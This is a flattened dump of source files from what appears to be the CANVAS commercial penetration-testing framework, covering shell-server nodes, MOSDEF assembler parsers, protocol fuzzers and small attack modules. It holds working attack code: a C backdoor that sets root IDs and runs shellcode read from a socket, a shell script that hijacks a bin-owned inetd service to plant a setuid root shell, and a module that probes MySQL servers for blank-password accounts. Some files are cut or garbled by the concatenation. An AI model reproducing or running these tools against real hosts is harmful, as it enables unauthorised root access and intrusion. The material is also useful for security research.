45 | 46 | 47 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/SQLNode.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """ 3 | localNode.py 4 | """ 5 | 6 | from CANVASNode import CANVASNode 7 | from exploitutils import * 8 | 9 | class SQLNode(CANVASNode): 10 | def __init__(self): 11 | CANVASNode.__init__(self) 12 | self.nodetype = "SQLNode" 13 | self.pix = "SQLNode" 14 | self.capabilities = [] 15 | self.activate_text() 16 | 17 | ###### Node Messenging 18 | # A localnode uses standard "socket" objects. 19 | def send(self,sock,message): 20 | """ 21 | sock is any object that supports send(). Here we send a message to another node. 22 | 23 | should probably make this reliable 24 | """ 25 | #sock.send(message) 26 | return 27 | 28 | def recv(self,sock,length): 29 | """ 30 | Recv data from another node 31 | 32 | reliably read off our stream without being O(N). If you just 33 | do a data+=tmp, then you will run into serious problems with large 34 | datasets 35 | """ 36 | #data="" 37 | #datalist=[] 38 | #readlength=0 39 | #while readlength" % modulename) 38 | mod = __import__(modulename, globals(), locals(), ["internal"]) 39 | return mod 40 | except: 41 | class void: 42 | pass 43 | return void() 44 | 45 | if __name__ == '__main__': 46 | print "OS:", OSVersion() 47 | print "Machine:", MachineVersion() 48 | maj, min, micro = PythonVersion() 49 | systemapi = SystemAPI() 50 | print systemapi 51 | print "DIR:", dir(systemapi) 52 | #for m in dir(systemapi): 53 | # print "%s is %s: %s" % (m, type(getattr(systemapi, m)), getattr(systemapi, m)) 54 | print "done." 55 | 56 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/ppcparse.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """ 3 | ppcparse.py 4 | 5 | PPC parser for CANVAS 6 | 7 | """ 8 | 9 | import mosdefutils 10 | from riscparse import * 11 | from ppcassembler import ppcassembler 12 | 13 | class ppcparse(ppcassembler, riscparse): 14 | def __init__(self, runpass=1): 15 | riscparse.__init__(self, 'ppc', runpass) 16 | 17 | def p_linelist_2(self,p): 18 | 'linelist : line linelist' 19 | #"""linelist : line newlinelist linelist 20 | # linelist : newlinelist linelist 21 | # linelist : 22 | #""" 23 | 24 | #def p_newlinelist(self,p): 25 | # """newlinelist : NEWLINE 26 | # newlinelist : NEWLINE newlinelist 27 | # """ 28 | 29 | def p_line_7(self, p): 30 | 'line : OPCODE' 31 | self.value+= [self.instruction(p[1], [])] 32 | 33 | #def p_line_9(self, p): 34 | # 'line : NEWLINE NEWLINE' 35 | # pass 36 | 37 | def p_opcodearg_4(self,p): 38 | 'opcodearg : ID' 39 | p[0]=self.resolvelabel(p[1]) - self.length 40 | 41 | def p_expression_2(self,p): 42 | 'expression : number LPAREN expressionlist RPAREN' 43 | p[0]=(p[1], p[3]) 44 | 45 | def p_register(self,p): 46 | '''register : REGISTER 47 | register : PERCENT REGISTER 48 | ''' 49 | if len(p) == 2: 50 | p[0] = p[1] 51 | else: 52 | p[0] = p[1] + p[2] 53 | 54 | #def p_branchcode(self,p): 55 | # 'branchcode : BRANCHCODE' 56 | # p[0]=p[1] 57 | 58 | def getparser(runpass=1): 59 | return procgetparser(ppcparse, runpass=runpass, parsetab_name="ppc_parsetab") 60 | 61 | if __name__ == "__main__": 62 | testparser(getparser) 63 | 64 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/backdoors/mosdef_escale_666.c: -------------------------------------------------------------------------------- 1 | // 2 | // code compiling with gcc and MOSDEF 3 | // 4 | // this file is used in DSU to elevate priviledges of a MOSDEF node. 5 | // 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #ifdef __MOSDEF__ 13 | # include 14 | #endif 15 | 16 | #ifdef __MOSDEF__ 17 | # define sizeof(len) 4 18 | #import "string", "FILENAME" as "FILENAME" 19 | #else 20 | # define callptr(ptr) ((void(*)())(ptr))() 21 | #endif 22 | 23 | //XXX: problem, ifndef gets checked in remoteresolver self.vars, but vars['SOCK'] is set 24 | // local to compile() only, not to self.vars 25 | //#ifndef SOCK 26 | //# define SOCK 666 27 | //#endif 28 | //XXX: so have to take this out so that 'SOCK' is assumed (only exists in local compile vars) 29 | 30 | // XXX: this breaks DSU from CANVAS .. commenting out for now 31 | 32 | //#ifndef FILENAME 33 | //# define FILENAME argv[0] 34 | //#endif 35 | 36 | 37 | int 38 | main(int argc, char **argv) 39 | { 40 | int ret; 41 | int len; 42 | void *m; 43 | char **filename; 44 | 45 | filename = FILENAME; 46 | setuid(0); 47 | setgid(0); 48 | chown(filename, 0, 0); 49 | chmod(filename, 06755); 50 | 51 | ret = read(SOCK, &len, sizeof(len)); 52 | if (ret != sizeof(len)) { 53 | _exit(3); 54 | } 55 | 56 | m = mmap(0, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); 57 | if (m == MAP_FAILED) { 58 | _exit(4); 59 | } 60 | 61 | ret = read(SOCK, m, len); 62 | if (ret != len) { 63 | _exit(5); 64 | } 65 | 66 | // little faux read syscall to flush icache on PPC .. should not hurt anything elsewhere .. 67 | read(0, 0, 0); 68 | 69 | callptr(m); 70 | 71 | _exit(7); 72 | 73 | return 0; 74 | } 75 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/remark_in_log/remark_in_log.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """ 4 | Remark in Log 5 | 6 | Just make a log of some remarks. 7 | This goes in the configuration tab. 8 | """ 9 | 10 | #Proprietary CANVAS source code - use only under the license agreement 11 | #specified in LICENSE.txt in your CANVAS distribution 12 | #Copyright Immunity, Inc, 2002-2006 13 | #http://www.immunityinc.com/CANVAS/ for more information 14 | 15 | import socket 16 | import getopt 17 | import sys 18 | from engine.config import * 19 | import canvasengine 20 | 21 | if "." not in sys.path: 22 | sys.path.append(".") 23 | 24 | 25 | 26 | from canvasexploit import canvasexploit 27 | from exploitutils import * 28 | import canvasengine 29 | 30 | #TODO: FIX THESE 31 | DOCUMENTATION={} 32 | #DOCUMENTATION["Date public"]="00/00/0000" 33 | #DOCUMENTATION["CERT Advisory"]="" 34 | #DOCUMENTATION["CVE Name"]="" 35 | #DOCUMENTATION["References"]="" 36 | 37 | DESCRIPTION="Make a remark into the logs" 38 | 39 | VERSION="1.0" 40 | 41 | #affectsList=["Recon"] 42 | PROPERTY = {} 43 | PROPERTY['TYPE'] = "Configuration" 44 | 45 | NAME="Remark in Log" 46 | 47 | class theexploit(canvasexploit): 48 | def __init__(self): 49 | canvasexploit.__init__(self) 50 | 51 | self.name=NAME 52 | self.comment="" 53 | return 54 | 55 | def getargs(self): 56 | """Gets arguments""" 57 | self.getarg("comment") 58 | return 59 | 60 | def run(self): 61 | """ 62 | runs the attempt to set configuration 63 | """ 64 | self.getargs() 65 | self.log("User Comment: %s"%self.comment) 66 | return 1 67 | 68 | if __name__ == '__main__': 69 | app = theexploit() 70 | ret=standard_callback_commandline(app) 71 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/internal/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | __all__ = [ 4 | ############ 5 | # submodules 6 | ############ 7 | 8 | #'logging', 9 | #'debug', 10 | #'path', 11 | 'colors', 12 | #'portability', 13 | #'uniqlist', 14 | #'threadutils', 15 | #'PySystemAPI', 16 | 17 | ########### 18 | # functions 19 | ########### 20 | 21 | # debug 22 | 'debug_enabled', 'debug_threads', 23 | 'devlog', 'isdebug', 'devassert', 'devexec', 'add_debug_level', 'backtrace', 24 | 25 | # portability 26 | 'deprecate', 'warnings_safely_ignore', 'warning_restore', 27 | 28 | # path 29 | 'add_python_paths', 'pathlist', 30 | 31 | # uniqlist 32 | 'uniqlist', 33 | 34 | # threadutils 35 | 'threadutils_add', 'threadutils_del', 'threadutils_exiting', 'threadutils_cleanup', 36 | 37 | # PySystemAPI 38 | 'systemapi', 39 | ] 40 | 41 | import logging 42 | import debug 43 | import uniqlist 44 | import path 45 | import portability 46 | from threadutils import * 47 | import PySystemAPI 48 | 49 | logging.logging_init() 50 | debug.debug_init() 51 | 52 | # var 53 | debug_enabled = debug.debug_enabled 54 | debug_threads = debug.debug_threads 55 | 56 | # func 57 | devlog = debug.devlog 58 | isdebug = debug.isdebug 59 | devassert = debug.devassert 60 | devexec = debug.devexec 61 | add_debug_level = debug.add_debug_level 62 | backtrace = debug.backtrace 63 | deprecate = portability.deprecate 64 | warnings_safely_ignore = portability.warnings_safely_ignore 65 | warning_restore = portability.warning_restore 66 | add_python_paths = path.add_python_paths 67 | pathlist = path.pathlist 68 | uniqlist = uniqlist.uniqlist 69 | 70 | # instances from modules 71 | systemapi = PySystemAPI.SystemAPI() 72 | 73 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/fuzzers/dcefuzz_msdns.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | if "." not in sys.path: sys.path.append(".") 4 | 5 | from fuzzers.dcefuzz import * 6 | 7 | def createmsdnspkt(marshaller): 8 | """ 9 | long Function_01( [in] [unique] [string] wchar_t * element_148, 10 | [in] [unique] [string] char * element_149, 11 | [in] [unique] [string] char * element_150, 12 | [out] long * element_151, 13 | [out] TYPE_1 * element_152 14 | ); 15 | """ 16 | data="" 17 | data+=wchar_t(msunistring("Word"),["pointer"],marshaller).marshall() 18 | data+=char_t("hell",["pointer"],marshaller).marshall() 19 | data+=char_t("hello",["pointer"],marshaller).marshall() 20 | return data 21 | 22 | 23 | def runtest_msdns(target): 24 | log("Running msdns test") 25 | 26 | UUID="50abc2a4-574d-40b3-9d66-ee4fd5fba076" 27 | port=get_tcp_port(UUID,target) 28 | if not port: 29 | log("Could not get port for UUID %s"%UUID) 30 | return 0 31 | log("Found UUID on port %d"%port) 32 | connectionList = ["ncacn_ip_tcp:%s[%d]"% (target,port)] 33 | version="5.0" 34 | mydcefuzzer=dcefuzzer() 35 | #mydcefuzzer.user="Administrator" 36 | #mydcefuzzer.password="password" 37 | #mydcefuzzer.skipvars(1) 38 | mydcefuzzer.create_pkt="createmsdnspkt" 39 | mydcefuzzer.target=target 40 | mydcefuzzer.connectionList=connectionList 41 | mydcefuzzer.UUID=UUID 42 | mydcefuzzer.version=version 43 | mydcefuzzer.opcode=1 44 | global g_dcefuzzer 45 | g_dcefuzzer=mydcefuzzer 46 | log("Running fuzzer") 47 | mydcefuzzer.run() 48 | log("Fuzzer run done") 49 | return 50 | 51 | def main(): 52 | import sys 53 | runtest_msdns(sys.argv[1]) 54 | 55 | if __name__=="__main__": 56 | main() 57 | 58 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEFShellServer/MSSgeneric.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import struct 9 | from exploitutils import * 10 | 11 | from MSSsystem import MSSsystem 12 | from MSSnetwork import MSSnetwork 13 | 14 | BigEndian_Processors = ["Sparc", "PPC", "POWER", "PowerPC", "MIPS"] 15 | 16 | class MSSgeneric(MSSnetwork, MSSsystem): 17 | 18 | Endianness = 'little' # XXX STATIC 19 | _endian_fmt = {'little': "<", 'big': ">"} 20 | 21 | def __init__(self, arch = None): 22 | 23 | self.doDes = False # start with plaintext mosdef 24 | 25 | if arch == None: 26 | assert hasattr(self, 'arch'), "instance missing a \"arch\" member" 27 | arch = self.arch 28 | for proc in BigEndian_Processors: 29 | if arch.upper() == proc.upper(): 30 | self.Endianness = 'big' 31 | break 32 | 33 | def _struct_fmt(self, fmt): 34 | return self._endian_fmt[self.Endianness] + fmt 35 | 36 | def str2int32(self, buf): 37 | return struct.unpack(self._struct_fmt("L"), buf[:4])[0] 38 | 39 | def int2str32(self, integer): 40 | return struct.pack(self._struct_fmt("L"), integer) 41 | 42 | def runCode(self, code, vars): 43 | """ 44 | usage: node.shell.runCode("int main() ...", {"DEFINE" : 0 ...}) 45 | """ 46 | self.clearfunctioncache() 47 | message = self.compile(code, vars) 48 | self.sendrequest(message) 49 | ret = self.readint() 50 | self.leave() 51 | return ret 52 | 53 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/drinkcoaster/drinkcoaster.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2008 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys 9 | if '.' not in sys.path: 10 | sys.path.append('.') 11 | 12 | from exploitutils import * 13 | from canvasexploit import canvasexploit 14 | 15 | NAME = "drinkcoaster" 16 | DESCRIPTION = "Provides a useful drink coaster! (drive D: is used)" 17 | VERSION = "1.0" 18 | 19 | DOCUMENTATION = {} 20 | 21 | PROPERTY = {} 22 | PROPERTY['TYPE'] = "Commands" 23 | PROPERTY['SITE'] = "Local" 24 | 25 | class theexploit(canvasexploit): 26 | def __init__(self): 27 | canvasexploit.__init__(self) 28 | self.result = "" 29 | self.name = NAME 30 | return 31 | 32 | def run(self): 33 | self.setInfo("%s (in progress)" % (NAME)) 34 | for node in self.argsDict["passednodes"]: 35 | type = node.nodetype 36 | 37 | if type == "UnixShellNode": 38 | self.result = node.runcommand("eject /dev/cdrom") 39 | elif "linux" in node.capabilities: 40 | result = node.shell.runcommand("eject /dev/cdrom") 41 | elif "win32api" in node.capabilities: 42 | self.result = node.shell.drinkcoaster("D:") 43 | else: 44 | self.log("Node of type %s not supported yet." % type) 45 | pass 46 | 47 | if self.result != "": 48 | self.log("Result: %s" % self.result) 49 | 50 | self.setInfo("%s - (finished)" % (NAME)) 51 | return 1 52 | 53 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/tftp_fuzzer/tftp_fuzzer.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """ 4 | 5 | TFTP Fuzzer 6 | 7 | """ 8 | 9 | import traceback 10 | import sys 11 | if "." not in sys.path: 12 | sys.path.append('.') 13 | import os , dircache 14 | import time 15 | 16 | from exploitutils import * 17 | from fuzzers.spike import * 18 | 19 | from canvasexploit import * 20 | 21 | 22 | 23 | NAME="tftp fuzzer" 24 | DESCRIPTION="Fuzzer for TFTP Servers" 25 | DOCUMENTATION={} 26 | DOCUMENTATION["Repeatability"]="Infinite - fuzzer" 27 | DOCUMENTATION["Date public"] = "N/A" 28 | 29 | VERSION="1.0" 30 | 31 | PROPERTY = {} 32 | PROPERTY['TYPE'] = "Fuzzers" 33 | 34 | class theexploit(canvasexploit): 35 | def __init__(self): 36 | canvasexploit.__init__(self) 37 | self.filename="" 38 | self.user="" 39 | self.password="" 40 | self.port=69 41 | return 42 | 43 | def getargs(self): 44 | self.host=self.target.interface 45 | 46 | self.getarg("filename") 47 | self.getarg("user") 48 | self.getarg("password") 49 | return 50 | 51 | def run(self): 52 | self.getargs() 53 | #get all spike scripts we currently have with tftp*.spk 54 | dirlist=dircache.listdir("fuzzers/SPIKESCRIPTS/") 55 | spikescripts=[] 56 | for s in dirlist: 57 | if s.startswith("tftp"): 58 | spikescripts+=[s] 59 | 60 | for scriptname in spikescripts: 61 | run_on_target(self.host, self.port, scriptname, protocol="UDP") 62 | 63 | #we ran so we succeeded :> 64 | return 1 65 | 66 | if __name__=="__main__": 67 | app=theexploit() 68 | ret=standard_callback_commandline(app) 69 | if ret not in [0,1,None] and hasattr(ret,'interact'): 70 | ret.interact() 71 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/struct_endian.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | import struct 4 | 5 | class struct_endian: 6 | """ 7 | a struct.struct hook with endian facilities 8 | """ 9 | 10 | __default_endian = 'little' 11 | __endian_list = ['big', 'little'] 12 | __endian_fmt = {'big': ">", 'little': "<"} 13 | __endian_rfmt = {'>': "big", '<': "little"} 14 | 15 | def __init__(self, endian = None): 16 | if endian not in self.__endian_list: 17 | endian = self.__default_endian 18 | self.set_endian(endian) 19 | 20 | def __repr__(self): 21 | return "" % self._endian.upper() 22 | 23 | def __fmt(self, fmt): 24 | if fmt[0] not in '@=<>!': 25 | fmt = self.__endian_fmt[self._endian] + fmt 26 | return fmt 27 | 28 | def set_endian(self, endian): 29 | if endian in self.__endian_rfmt.keys(): 30 | endian = self.__endian_rfmt[endian] 31 | self._endian = endian 32 | 33 | def get_endian(self): 34 | return self._endian 35 | 36 | def switch_endian(self): 37 | self._endian = self.__endian_list[(self.__endian_list.index(self._endian) + 1) % 2] 38 | 39 | def pack(self, fmt, *args): 40 | return struct.pack(self.__fmt(fmt), *args) 41 | 42 | def unpack(self, fmt, *args): 43 | return struct.unpack(self.__fmt(fmt), *args) 44 | 45 | def calcsize(self, fmt, *args): 46 | return struct.calcsize(self.__fmt(fmt), *args) 47 | 48 | 49 | __struct_endian_little = struct_endian('little') 50 | __struct_endian_big = struct_endian('big') 51 | 52 | little_pack = __struct_endian_little.pack 53 | little_unpack = __struct_endian_little.unpack 54 | big_pack = __struct_endian_big.pack 55 | big_unpack = __struct_endian_big.unpack 56 | 57 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/BSD.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from UNIX import UNIX 4 | 5 | class BSD(UNIX): 6 | #S_IREAD = S_IRUSR 7 | #S_IWRITE = S_IWUSR 8 | #S_IEXEC = S_IXUSR 9 | 10 | def __init__(self): 11 | UNIX.__init__(self) 12 | 13 | 14 | class BSD41(BSD): # HPUX+IRIX+SunOS+oldMacOS 15 | 16 | # 17 | 18 | SIOCGIFADDR = 0xc020690dL # _IOWR('i',13, struct ifreq) 19 | SIOCGIFCONF = 0xc0086914L # _IOWR('i',20, struct ifconf) 20 | 21 | def __init__(self): 22 | BSD.__init__(self) 23 | 24 | 25 | class BSD42(BSD41): 26 | 27 | # 28 | 29 | INADDR_ANY = 0x00000000 30 | INADDR_BROADCAST = 0xffffffff 31 | INADDR_NONE = 0xffffffff 32 | INADDR_LOOPBACK = 0x7f000001 33 | 34 | IN_LOOPBACKNET = 127 35 | 36 | def __init__(self): 37 | BSD41.__init__(self) 38 | 39 | 40 | class BSD43(BSD42): 41 | 42 | # 43 | 44 | SIOCGIFNETMASK = 0xc0206919L # _IOWR('i',21, struct ifreq) 45 | 46 | def __init__(self): 47 | BSD42.__init__(self) 48 | 49 | 50 | class BSD44(BSD43): 51 | 52 | def __init__(self): 53 | BSD43.__init__(self) 54 | 55 | 56 | class BSD44lite1(BSD44): 57 | 58 | def __init__(self): 59 | BSD44.__init__(self) 60 | 61 | 62 | class BSD44lite2(BSD44lite1): 63 | 64 | def __init__(self): 65 | BSD44lite1.__init__(self) 66 | 67 | 68 | # XXX: place holder untill we have time to fully port it over 69 | # XXX: TODO: port defines, port syscall table, port syscall gen. 70 | # XXX: TODO: deal with stat asm.i386 structs for BSD 71 | # XXX: TODO: match functionality with Linux_intel class 72 | 73 | class BSD_intel(BSD44lite2): 74 | 75 | def __init__(self, version = None): 76 | BSD44lite2.__init__(self) 77 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/ScriptShellServer.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """ 4 | CANVAS Scripting shell server for Scripting languages like PHP and Python and whatnot 5 | """ 6 | 7 | #Proprietary CANVAS source code - use only under the license agreement 8 | #specified in LICENSE.txt in your CANVAS distribution 9 | #Copyright Immunity, Inc, 2002-2006 10 | #http://www.immunityinc.com/CANVAS/ for more information 11 | 12 | 13 | from shellserver import shellserver 14 | from exploitutils import * 15 | import time 16 | import os 17 | import socket 18 | from phplistener import phplistener 19 | 20 | class phpshellserver( phplistener): 21 | """ 22 | PHP Shell Listener 23 | """ 24 | 25 | def __init__(self,connection,node,logfunction=None): 26 | #shellserver.__init__(self,connection,node,type="Active",logfunction=logfunction) 27 | self.arch="x86" 28 | self.order=intel_order 29 | self.unorder=istr2int 30 | self.connection=connection 31 | self.node=node 32 | self.node.shell=self 33 | self.started= 0 34 | self.logfunction = logfunction 35 | self.engine=node.engine 36 | return 37 | 38 | def startup(self): 39 | """ 40 | Start this process... 41 | """ 42 | if self.started: 43 | return 44 | self.log("Startup PHP Script Shell Server...") 45 | self.started=1 46 | phplistener.__init__(self,self.connection,logfunction=self.logfunction) 47 | phplistener.startup(self) 48 | print self.node.shell 49 | self.log("Set up shell listener") 50 | #ok, now our mainloop code is running over on the other side 51 | self.log("Set up PHP shell server") 52 | #self.sendrequest(mainloop) 53 | self.node.getInfo() 54 | 55 | return 1 -------------------------------------------------------------------------------- /CANVAS_HTSRL/bin2root.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | #sunlogin post-exploitation exploit. upgrades from uid = bin to euid = root 3 | #beta. needs better scripting 4 | #sinan.eren@immunityinc.com 5 | 6 | isbinowner() 7 | { 8 | if [ "$ISBIN" = "bin" ]; then 9 | each=`echo $foo` 10 | echo $each 11 | GROUP=`ls -alL $each 2>/dev/null | awk {'print $4'}` 12 | exploit 13 | exit 14 | else 15 | test 16 | fi 17 | } 18 | 19 | exploit() 20 | { 21 | 22 | #take backup of original binary 23 | BACKUP=`date +%M%S`"canvas.bin" 24 | cp $each /tmp/$BACKUP 25 | touch -r $each /tmp/$BACKUP 26 | chown bin /tmp/$BACKUP 27 | chgrp $GROUP /tmp/$BACKUP 28 | 29 | #now exploit 30 | SERVICE=`grep $each /etc/inetd.conf | head -1 | awk {'print $1'}` 31 | echo "exploiting user bin owned service $SERVICE" 32 | OWNER=`date +%M%S`"madam" 33 | CMDFILE=`date +%M%S`"cmdz" 34 | echo "using backdoor binary $OWNER" 35 | cp /bin/ksh /tmp/$OWNER 36 | #securing so only group/user bin can get root out of it 37 | echo "securing backdoor so only user/group bin can run it" 38 | chmod 750 /tmp/$OWNER 39 | chgrp bin /tmp/$OWNER 40 | 41 | echo "exploiting!" 42 | cp -f /bin/sh $each 43 | CMDZ="chown root /tmp/$OWNER; chmod 4750 /tmp/$OWNER; exit;" 44 | echo $CMDZ > $CMDFILE 45 | telnet 127.0.0.1 $SERVICE < $CMDFILE 46 | echo "restoring binary" 47 | cp -f $BACKUP $each 48 | touch -r $BACKUP $each 49 | echo "cleanin up" 50 | rm -f $CMDFILE $BACKUP 51 | echo "trying to get root" 52 | echo "DO NOT FORGET TO rm -f OR unlink THE SUID SHELL: /tmp/$OWNER" 53 | /tmp/$OWNER -i 54 | 55 | } 56 | 57 | PATH=/usr/bin:/usr/sbin:/sbin:$PATH 58 | export PATH 59 | INETD=`cat /etc/inetd.conf | grep -v "#" | grep tcp| grep root | awk {'print $6'} | grep -v internal` 60 | for each in $INETD: 61 | do foo=`echo $each | sed s/://`; echo $foo; ISBIN=`ls -alL $foo 2>/dev/null | awk {'print $3'}`; echo $ISBIN; isbinowner; 62 | done 63 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/dir/dir.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2008 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys 9 | if "." not in sys.path: 10 | sys.path.append(".") 11 | 12 | from exploitutils import * 13 | from canvasexploit import canvasexploit 14 | 15 | NAME = "dir" 16 | DESCRIPTION = "Gets directory listing" 17 | DOCUMENTATION = {} 18 | VERSION = "1.0" 19 | 20 | PROPERTY = {} 21 | PROPERTY['TYPE'] = "Commands" 22 | PROPERTY['SITE'] = "Local" 23 | 24 | class theexploit(canvasexploit): 25 | def __init__(self): 26 | canvasexploit.__init__(self) 27 | self.result = "" 28 | self.supportedNodeTypes = ["LocalNode", "UnixShellNode", "win32Node", "linuxNode", "osxNode"] 29 | self.name = NAME 30 | self.directory = "." 31 | return 32 | 33 | def getargs(self): 34 | self.directory = self.argsDict.get("directory", self.directory) 35 | return 36 | 37 | def run(self): 38 | self.setInfo("%s (in progress)" % (NAME)) 39 | self.getargs() 40 | 41 | node = self.argsDict["passednodes"][0] 42 | nodetype = node.nodetype 43 | 44 | # shouldn't we be doing a nodetype check here ? 45 | self.result = node.dir(self.directory) 46 | 47 | if type(self.result) == type([]): 48 | self.result = "\n".join(self.result) 49 | 50 | self.dispshellcmd = "dir %s" % self.directory 51 | self.log("listing: %s\n%s" % (self.directory, self.result)) 52 | 53 | self.setInfo("%s %s - (finished)" % (NAME, self.directory)) 54 | return 1 55 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/tlslite/utils/OpenSSL_TripleDES.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | """OpenSSL/M2Crypto 3DES implementation.""" 3 | 4 | from cryptomath import * 5 | from TripleDES import * 6 | 7 | if m2cryptoLoaded: 8 | 9 | def new(key, mode, IV): 10 | return OpenSSL_TripleDES(key, mode, IV) 11 | 12 | class OpenSSL_TripleDES(TripleDES): 13 | 14 | def __init__(self, key, mode, IV): 15 | TripleDES.__init__(self, key, mode, IV, "openssl") 16 | self.key = key 17 | self.IV = IV 18 | 19 | def _createContext(self, encrypt): 20 | context = m2.cipher_ctx_new() 21 | cipherType = m2.des_ede3_cbc() 22 | m2.cipher_init(context, cipherType, self.key, self.IV, encrypt) 23 | return context 24 | 25 | def encrypt(self, plaintext): 26 | TripleDES.encrypt(self, plaintext) 27 | context = self._createContext(1) 28 | ciphertext = m2.cipher_update(context, plaintext) 29 | m2.cipher_ctx_free(context) 30 | self.IV = ciphertext[-self.block_size:] 31 | return ciphertext 32 | 33 | def decrypt(self, ciphertext): 34 | TripleDES.decrypt(self, ciphertext) 35 | context = self._createContext(0) 36 | #I think M2Crypto has a bug - it fails to decrypt and return the last block passed in. 37 | #To work around this, we append sixteen zeros to the string, below: 38 | plaintext = m2.cipher_update(context, ciphertext+('\0'*16)) 39 | 40 | #If this bug is ever fixed, then plaintext will end up having a garbage 41 | #plaintext block on the end. That's okay - the below code will ignore it. 42 | plaintext = plaintext[:len(ciphertext)] 43 | m2.cipher_ctx_free(context) 44 | self.IV = ciphertext[-self.block_size:] 45 | return plaintext -------------------------------------------------------------------------------- /CANVAS_HTSRL/osdetection/sql.py: -------------------------------------------------------------------------------- 1 | # inherits self.target, self.engine from parent class osdetect 2 | 3 | import libs.canvasos as canvasos 4 | from libs import mysqllib 5 | 6 | class sqldetect: 7 | def __init__(self): 8 | return 9 | 10 | def run_sqldetect(self): 11 | 12 | result = None 13 | 14 | # MySQL OS detection through status detection 15 | try: 16 | self.log("SQL DETECT: Doing MySQL status os detection") 17 | m = mysqllib.MySQL() 18 | m.connect((self.host, 3306)) 19 | for x in [ "root", "mysql", "anonymous", "nobody" ]: 20 | try: 21 | ret = m.authenticate(x, '') 22 | # This username failed move on to next one 23 | except: 24 | continue 25 | if ["Access denied" not in ret ]: 26 | self.log("SQL DETECT: Successfully found open MySQL account: "+x) 27 | # add in vulnassess report the open mysql username that we found 28 | self.target.add_knowledge("MySQL-OpenUsername",x,100) 29 | self.log("SQL DETECT: Trying to discover os of remote SQL server") 30 | tk = m.simple_command(mysqllib.COM_STATISTICS, 'status') 31 | 32 | for y in ["linux", "freebsd", "windows"]: 33 | if y in tk.lower(): 34 | self.log("SQL DETECT: Discovered remote OS: " + y) 35 | self.target.add_knowledge('OS', y, 100) 36 | result = canvasos.new(y) 37 | break 38 | m.close() 39 | del(m) 40 | 41 | except Exception, msg: 42 | self.log("SQL DETECT: MySQL detection failed (%s)" % msg) 43 | 44 | return result 45 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/paramiko/logging22.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2003-2007 Robey Pointer 2 | # 3 | # This file is part of paramiko. 4 | # 5 | # Paramiko is free software; you can redistribute it and/or modify it under the 6 | # terms of the GNU Lesser General Public License as published by the Free 7 | # Software Foundation; either version 2.1 of the License, or (at your option) 8 | # any later version. 9 | # 10 | # Paramiko is distrubuted in the hope that it will be useful, but WITHOUT ANY 11 | # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR 12 | # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more 13 | # details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with Paramiko; if not, write to the Free Software Foundation, Inc., 17 | # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. 18 | 19 | """ 20 | Stub out logging on python < 2.3. 21 | """ 22 | 23 | 24 | DEBUG = 10 25 | INFO = 20 26 | WARNING = 30 27 | ERROR = 40 28 | CRITICAL = 50 29 | 30 | 31 | def getLogger(name): 32 | return _logger 33 | 34 | 35 | class logger (object): 36 | def __init__(self): 37 | self.handlers = [ ] 38 | self.level = ERROR 39 | 40 | def setLevel(self, level): 41 | self.level = level 42 | 43 | def addHandler(self, h): 44 | self.handlers.append(h) 45 | 46 | def addFilter(self, filter): 47 | pass 48 | 49 | def log(self, level, text): 50 | if level >= self.level: 51 | for h in self.handlers: 52 | h.f.write(text + '\n') 53 | h.f.flush() 54 | 55 | class StreamHandler (object): 56 | def __init__(self, f): 57 | self.f = f 58 | 59 | def setFormatter(self, f): 60 | pass 61 | 62 | class Formatter (object): 63 | def __init__(self, x, y): 64 | pass 65 | 66 | _logger = logger() 67 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/libs/help.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | help 5 | 6 | 7 | 8 | 9 | 10 |

Help and Other Information

